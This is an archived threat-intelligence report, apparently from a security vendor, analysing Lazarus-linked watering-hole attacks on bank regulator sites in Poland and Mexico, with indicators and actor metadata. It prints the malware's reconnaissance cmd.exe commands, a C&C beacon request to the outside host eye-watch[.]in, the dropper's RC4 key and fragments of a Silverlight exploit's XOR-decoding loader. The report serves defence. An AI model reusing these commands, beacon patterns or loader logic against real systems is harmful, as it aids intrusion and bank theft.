{
	"id": "e6d92424-d845-4f29-938a-6d177af5ac88",
	"created_at": "2026-04-06T00:20:53.941073Z",
	"updated_at": "2026-04-10T03:38:19.431952Z",
	"deleted_at": null,
	"sha1_hash": "9c15bcff4c9310fe201beb9415deac58b1c80b24",
	"title": "Lazarus \u0026 Watering-hole attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 272672,
	"plain_text": "Lazarus \u0026 Watering-hole attacks\r\nArchived: 2026-04-02 10:45:33 UTC\r\nOn 3rd February 2017, researchers at badcyber.com released an article that detailed a series of attacks directed at\r\nPolish financial institutions. The article is brief, but states that \"This is – by far – the most serious information\r\nsecurity incident we have seen in Poland\" followed by a claim that over 20 commercial banks had been confirmed\r\nas victims.\r\nThis report provides an outline of the attacks based on what was shared in the article, and our own additional\r\nfindings.\r\nANALYSIS\r\nAs stated in the blog, the attacks are suspected of originating from the website of the Polish Financial Supervision Authority\r\n(knf.gov[.]pl), shown below:\r\nFrom at least 2016-10-07 to late January the website code had been modified to cause visitors to download\r\nmalicious JavaScript files from the following locations:\r\nhxxp://sap.misapor[.]ch/vishop/view.jsp?pagenum=1\r\nhxxps://www.eye-watch[.]in/design/fancybox/Pnf.action\r\nBoth of these appear to be compromised domains given they are also hosting legitimate content and have done for\r\nsome time. The malicious JavaScript leads to the download of malware to the victim’s device.\r\nSome hashes of the backdoor have been provided in BadCyber's technical analysis:\r\nhttps://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html\r\nPage 1 of 10\n\n85d316590edfb4212049c4490db08c4b\r\nc1364bbf63b3617b25b58209e4529d8c\r\n1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae\r\nThe C\u0026Cs given in the BadCyber analysis were the following IP addresses:\r\n125.214.195.17\r\n196.29.166.218\r\nLAZARUS MALWARE\r\nOnly one of the samples referenced by BadCyber is available in public malware repositories. 
At the moment we\r\ncannot verify that it originated from the watering-hole on the KNF website – but we have no reason to doubt this\r\neither.\r\nMD5 hash | Filename | File Info | First seen | Origin\r\n85d316590edfb4212049c4490db08c4b | gpsvc.exe | Win32 (736 KB) | 2017-01-26 07:46:24 | PL\r\nThe file is packed with a commercial packer known as 'Enigma Protector'. Once unpacked it drops a known\r\nmalware variant, which has been seen as part of the Lazarus group’s toolkit in other cases over the past year.\r\nThe unpacked executable takes several command line arguments:\r\n-l : list service names, available for its own registration\r\n-o : open specified event\r\n-t : set specified event\r\n-x [PASSWORD] -e [SERVICE_NAME] : drop/install DLL under specified [SERVICE_NAME]\r\n-x [PASSWORD] -f [SERVICE_NAME] : recreate the keys that keep the password for the next stage DLL, under the\r\nspecified [SERVICE_NAME]\r\nThe provided password's MD5 hash is used as an RC4 key. On top of that, there is one more RC4 round,\r\nusing a hard-coded 32-byte RC4 key:\r\n53 87 F2 11 30 3D B5 52 AD C8 28 09 E0 52 60 D0 6C C5 68 E2 70 77 3C 8F 12 C0 7B 13 D7 B3 9F 15\r\nOnce the data is decrypted with the two RC4 rounds, the dropper checks that the decrypted data contains a valid 4-byte\r\nsignature: 0xBC0F1DAD.\r\nWATERING HOLE ANALYSIS\r\nThe attacker content on the compromised sap.misapor[.]ch site was not accessible at the time of writing.\r\nHowever, archived versions of some pages can be found:\r\nhttp://web.archive[.]org/web/20170203175640/https://sap.misapor.ch/Default.html\nhttp://web.archive[.]org/web/20170203175641/https://sap.misapor.ch/Silverlight.js\nThe Default.html contains code to load MisaporPortalUI.xap – a Silverlight application which likely would\ncontain the malicious first-stage implant. 
This is unfortunately not available for analysis currently.\n\nADDITIONAL WATERING HOLES\nThe eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector\nwebsites. On 2016-11-08 we observed connections to the site referred from:\nhxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx\nThis is the page for the Comisión Nacional Bancaria y de Valores (National Banking and Stock Commission of\nMexico), specifically the portion of their site that details sanctions made by the Mexican National Banking\nCommission. This organisation is the Mexican banking supervisor and the equivalent of Poland's KNF.\nIn this instance the site redirected to the following URL:\r\nhxxp://www.eye-watch[.]in/jscroll/images/images.jsp?pagenum=1\r\nAt the time of writing the compromise is no longer present and no archived versions of the page exist to show\r\nwhere the compromise was located.\r\nA further instance of the malicious code appears to have been present on a bank website in Uruguay around\r\n2016-10-26 when a PCAP of browsing to the website was uploaded to VirusTotal.com.\r\nThis shows a GET request made to:\r\nFollowed shortly after by connections to:\r\nUnfortunately, the response was empty and it is not possible to assess what may have been delivered.\r\nADDITIONAL MALWARE AND EXPLOIT ACTIVITY\r\nThe compromised eye-watch[.]in domain has been associated with other malicious activity in recent months.\r\nBelow is a list of samples which have used the site:\r\nMD5 hash | Filename | File Info | First seen | Origin\r\n4cc10ab3f4ee6769e520694a10f611d5 | cambio.xap | ZIP (73 KB) | 2016-10-07 03:09:43 | JP\r\ncb52c013f7af0219d45953bae663c9a2 | svchost.exe | Win32 EXE (126 KB) | 2016-10-24 12:10:33 | PL\r\n1f7897b041a812f96f1925138ea38c46 | gpsvc.exe | Win32 EXE (126 KB) | 2016-10-27 14:29:58 | UY\r\n911de8d67af652a87415f8c0a30688b2 | gpsvc.exe | Win32 EXE (126 KB) | 2016-10-28 11:50:15 | US\r\n1507e7a741367745425e0530e23768e6 | gpsvc.exe | Win32 EXE (126 KB) | 2016-11-15 18:20:34 | N/A\r\nThe last 4 samples can loosely be categorised as the same malware variant; however, the first sample appears to be\r\na separate exploit (as detailed later).\r\nIt is worth noting that these samples were all compiled after the domain began being used alongside the\r\nknf.gov[.]pl watering-hole. Additionally, the samples uploaded from Poland and Uruguay match with the\r\nwatering-hole activity observed – suggesting this is all part of the same campaign.\r\nDespite this potential connection to the Poland bank compromises, the malware is not particularly advanced – for\r\nexample using basic operations to gather system information. 
The malware attempts to run a series of commands\r\nwith cmd.exe and then returns the result via the C\u0026C, eye-watch[.]in.\r\nThese commands are as follows:\r\ncmd.exe /c hostname\r\ncmd.exe /c whoami\r\ncmd.exe /c ver\r\ncmd.exe /c ipconfig -all\r\ncmd.exe /c ping www.google.com\r\ncmd.exe /c query user\r\ncmd.exe /c net user\r\ncmd.exe /c net view\r\ncmd.exe /c net view /domain\r\ncmd.exe /c reg query \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\"\r\ncmd.exe /c tasklist /svc\r\ncmd.exe /c netstat -ano | find \"TCP\"\r\nAn example C\u0026C beacon is seen below:\r\nGET /design/dfbox/list.jsp?action=What\u0026u=10729854751740 HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0\r\nHost: www.eye-watch[.]in\r\nSILVERLIGHT XAP FILE\r\nThe cambio.xap archive sample (4cc10ab3f4ee6769e520694a10f611d5) does not use eye-watch[.]in as a C\u0026C\r\nchannel but instead was downloaded from the URL:\r\nhxxps://www.eye-watch[.]in/design/fancybox/include/cambio.xap\r\n'cambio' is Spanish for 'change'. The URL is similar to that noted in the BadCyber blog, and the use of an XAP\r\nfile matches what can be found in the Archive.org cache for the sap.misapor[.]ch site.\r\nXAP is a software package format used for Microsoft Silverlight applications.\r\nIt can be opened as a standard ZIP archive and contains the following files:\r\nAppManifest.xaml\r\nShell_siver.dll\r\nSystem.Xml.Linq.dll\r\nTogether they form a re-packaged exploit for Silverlight based on CVE-2016-0034 (MS16-006) – a Silverlight\r\nMemory Corruption vulnerability. 
The exploit has previously been used by several exploit kits including RIG and\r\nAngler to deliver multiple crimeware tools.\r\nThe Shell_siver.dll file contains a compile path:\r\nc:\\Users\\KKK\\Desktop\\Shell_siver\\Shell_siver\\obj\\Release\\Shell_siver.pdb\r\nInternally, the code of this DLL loads a 2nd stage library called binaryreader.Exploit – as seen below with the\r\nXOR-encoded string:\r\n// each byte XOR 17 decodes to the type name \"binaryreader.Exploit\"\r\nbyte[] array = new byte[]\r\n{\r\n115,120,127,112,99,104,99,116,112,117,\r\n116,99,63,84,105,97,125,126,120,101\r\n};\r\nthis.InitializeComponent();\r\nfor (int i = 0; i \u003c array.Length; i++)\r\n{\r\narray[i] ^= 17;\r\n}\r\nif (args.get_InitParams().get_Keys().Contains(\"shell32\"))\r\n{\r\n...\r\ntype.InvokeMember(\"run\", 256, null, obj, new object[])\r\n...\r\n}\r\nThis 2nd stage payload DLL contained within the assembly is 30,720 bytes in size and encoded with XOR 56:\r\n// copy the 30,720-byte payload from offset 54 of the embedded resource, then decode it with XOR 56\r\nBuffer.BlockCopy(Resource1._1, 54, array, 0, 30720);\r\ntry\r\n{\r\nfor (int i = 0; i \u003c array.Length; i++)\r\n{\r\nbyte b = 56;\r\narray[i] ^= b;\r\n}\r\n...\r\n}\r\nOnce the payload stub is decoded, it represents itself as a PE image, which is another .NET 4.0 assembly with the\r\ninternal name binaryreader.dll.\r\nThis second-stage DLL assembly, binaryreader.dll, is heavily obfuscated. The DLL (MD5 hash:\r\n7b4a8be258ecb191c4c519d7c486ed8a) is identical to the one reported in a malware traffic analysis blog post from\r\nMarch 2016 where it was used to deliver Qbot. 
Thus it is likely the code comes from a criminal exploit kit which\r\nis being leveraged for delivery in this campaign.\r\nA similarly named cambio.swf (MD5 hash: 6dffcfa68433f886b2e88fd984b4995a) was uploaded to VirusTotal\r\nfrom a US IP address in December 2016.\r\nIP WHITELISTS\r\nWhen examining the code on the exploit kit website a list of 255 IP address strings was found. The IPs only\r\ncontained the first 3 octets, and would have been used to filter traffic such that only IPs on those subnets would be\r\ndelivered the exploit and payload.\r\nThe IP addresses corresponded to a mix of public and private financial institutions spread across the globe:\r\nHowever, banks in some specific countries feature prominently in the list:\r\nRank | Country | Count\r\n1 | Poland | 19\r\n2 | United States | 15\r\n3 | Mexico | 9\r\n4 | United Kingdom | 7\r\n5 | Chile | 6\r\n6 | Brazil | 5\r\n7 | Peru | 3\r\n7 | Colombia | 3\r\n7 | Denmark | 3\r\n7 | India | 3\r\nThe prominence of Polish and Mexican banks matches the observation of watering-hole code on sites in both\r\ncountries.\r\nCONCLUSIONS\r\nThe evidence available is currently incomplete and at the moment we can only conclude the following:\r\n  •  There has been a series of watering-hole attacks on bank supervisor websites in Poland \u0026 Mexico, and a\r\nstate-owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver\r\nmalware.\r\n  •  Investigators in Poland have identified known Lazarus group implants on bank networks and\r\nassociated this with the recent compromise of the Polish Financial Supervision Authority's website.\r\nThe technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank\r\nattack and many others in 2016) to the watering-hole activity is unclear. 
However, the choice of bank supervisor /\r\nstate-bank websites would be apt, given their previous targeting of central banks for heists – even when it serves\r\nlittle operational benefit for infiltrating the wider banking sector.\r\nNonetheless, further evidence to connect together the pieces of this attack is needed, as well as insights into the\r\nend-goal of the culprits. We are continuing our analysis of new artefacts as they emerge and may issue further\r\nupdates in due course.\r\nRECOMMENDATIONS\r\nWe recommend organisations use the indicators provided in Appendix A to update their defensive systems to\r\nidentify attacks. For compromised legitimate websites we would suggest a minimum 1-month block be placed on\r\nthe domain. Patches against CVE-2016-0034 should be applied as soon as possible.\r\nAPPENDIX A - INDICATORS OF ATTACK\r\nC\u0026C IP addresses: 125.214.195.17, 196.29.166.218\r\nCompromised sites: knf.gov[.]pl (currently clean), www.cnbv.gob[.]mx (currently clean), brou.com[.]uy (currently clean), sap.misapor[.]ch, www.eye-watch[.]in\r\nMD5 hashes:\r\nc1364bbf63b3617b25b58209e4529d8c\r\n85d316590edfb4212049c4490db08c4b\r\n1bfbc0c9e0d9ceb5c3f4f6ced6bcfeae\r\n1507e7a741367745425e0530e23768e6\r\n911de8d67af652a87415f8c0a30688b2\r\n1f7897b041a812f96f1925138ea38c46\r\ncb52c013f7af0219d45953bae663c9a2\r\n4cc10ab3f4ee6769e520694a10f611d5\r\n7b4a8be258ecb191c4c519d7c486ed8a\r\nSource: https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html"
	],
	"report_names": [
		"lazarus-watering-hole-attacks.html"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434853,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9c15bcff4c9310fe201beb9415deac58b1c80b24.pdf",
		"text": "https://archive.orkl.eu/9c15bcff4c9310fe201beb9415deac58b1c80b24.txt",
		"img": "https://archive.orkl.eu/9c15bcff4c9310fe201beb9415deac58b1c80b24.jpg"
	}
}